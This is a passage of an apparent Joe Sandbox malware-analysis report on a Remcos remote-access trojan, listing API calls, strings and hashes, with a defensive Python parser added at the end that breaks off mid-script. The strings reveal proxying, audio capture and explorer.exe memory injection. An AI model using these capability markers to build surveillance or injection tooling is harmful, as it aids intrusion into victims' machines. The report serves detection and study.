                                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                  • API String ID: 3578746661-3604713145
                                                                                                                                  APIs
                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DecodePointer
                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 1324828854-2459865102
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                  • API String ID: 2050909247-4242073005
                                                                                                                                  APIs
                                                                                                                                  • _strftime.LIBCMT ref: 00401D50
                                                                                                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                  • API String ID: 3809562944-243156785
                                                                                                                                  APIs
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                  • int.LIBCPMT ref: 00410EBC
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                  • String ID: ,kG$0kG
                                                                                                                                  • API String ID: 3815856325-2015055088
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                  • waveInStart.WINMM ref: 00401CFE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                  • String ID: 8)3$dMG$|MG
                                                                                                                                  • API String ID: 1356121797-3655211567
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                  • GetMessageA.USER32 ref: 0041D591
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                  • String ID: Remcos
                                                                                                                                  • API String ID: 1970332568-165870891
                                                                                                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                  APIs
                                                                                                                                  • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                                                                  • String ID: Remcos v$5.1.3 Pro$CONOUT$$P2
                                                                                                                                  • API String ID: 4067487056-3459370436
                                                                                                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                  • __freea.LIBCMT ref: 00454083
                                                                                                                                  • __freea.LIBCMT ref: 0045408F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 201697637-0
                                                                                                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                  • _free.LIBCMT ref: 00445515
                                                                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                                                                  • _free.LIBCMT ref: 00445560
                                                                                                                                  • _free.LIBCMT ref: 00445569
                                                                                                                                  • _free.LIBCMT ref: 00445575
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: tcp$udp
                                                                                                                                  • API String ID: 0-3725065008
                                                                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                  APIs
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                  • String ID: PkG$XMG$NG$NG
                                                                                                                                  • API String ID: 1649129571-3151166067
                                                                                                                                  • Opcode ID: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                                                                                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                  • Opcode Fuzzy Hash: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                                                                                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                  APIs
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                  • String ID: csm$fYM/
                                                                                                                                  • API String ID: 1170836740-2417044826
                                                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
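The function records above (the tray-icon function whose String ID is "Remcos", the AllocConsole function carrying "Remcos v$5.1.3 Pro$CONOUT$$P2", the API-less function referencing "tcp$udp", the C-runtime exception-dispatch function from the module mapped at 10000000, and the CreateFileW/WriteFile/send/MoveFileW function that follows) are easier to triage when the export is parsed rather than read. The script below is an added example and is not code from the Joe Sandbox report, from Joe Security, or from the Remcos sample. It assumes two things about the export format that the page is consistent with but does not state: that each record is closed by its "Instruction Fuzzy Hash" line, and that the String ID field joins a function's strings with "$", so a string that itself ends in "$" (the console device name CONOUT$) appears as "$$". The sample input is transcribed from the records on this page, trimmed to the lines the parser reads, and its last record is cut short exactly as the page is at that point; the behaviour labels in RULES are the editor's own names, not Joe Sandbox signatures.

```python
"""Triage helper for the per-function records in a Joe Sandbox IDA-plugin export.
Added example, not code from the report or the Remcos sample. Assumed format:
a record is closed by its "Instruction Fuzzy Hash" line, and String ID joins a
function's strings with "$", so a string ending in "$" (CONOUT$) shows as "$$"."""
import re
from dataclasses import dataclass, field
# Constructed sample: five records transcribed from the report above, trimmed to
# the lines this script reads. The last one is cut short, as the report page is.
SAMPLE = """\
APIs
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
• lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
• Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: Remcos
• Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
APIs
• AllocConsole.KERNEL32 ref: 0041CE35
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: Remcos v$5.1.3 Pro$CONOUT$$P2
• Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: tcp$udp
• Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
APIs
• _ValidateLocalCookies.LIBCMT ref: 1000339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• String ID: csm$fYM/
• Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
• Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• MoveFileW.KERNEL32 ref: 00407AA5
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

API_RE = re.compile(r"^• (?:Part of subcall function [0-9A-F]+: )?([\w$@]+)\.(\w+)")
FIELD_RE = re.compile(r"^• (Source File|String ID|Instruction Fuzzy Hash): ?(.*)$")

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)     # (api, module), subcall APIs included
    strings: list = field(default_factory=list)
    base: str = ""                               # image base of the dump holding the function

def split_string_ids(value):
    """'CONOUT$$P2' -> ['CONOUT$', 'P2']: a literal '$' is assumed to be escaped as '$$'."""
    return [s.replace("\x00", "$") for s in value.replace("$$", "\x00$").split("$")] if value else []

def parse_records(text):
    records, cur = [], FuncRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := FIELD_RE.match(line):
            key, val = m.groups()
            if key == "Source File":
                off = re.search(r"Offset: ([0-9A-Fa-f]+)", val)
                cur.base = off.group(1) if off else ""
            elif key == "String ID":
                cur.strings = split_string_ids(val)
            else:                                # fuzzy hash closes the record
                records.append(cur)
                cur = FuncRecord()
        elif m := API_RE.match(line):
            cur.apis.append(m.groups())
    if cur.apis or cur.strings:                  # export cut short: keep the partial record
        records.append(cur)
    return records

# Behaviour rules (editor's labels): required API names plus a predicate over the strings.
RULES = [
    ("tray icon named Remcos", {"Shell_NotifyIconA"}, lambda s: "Remcos" in s),
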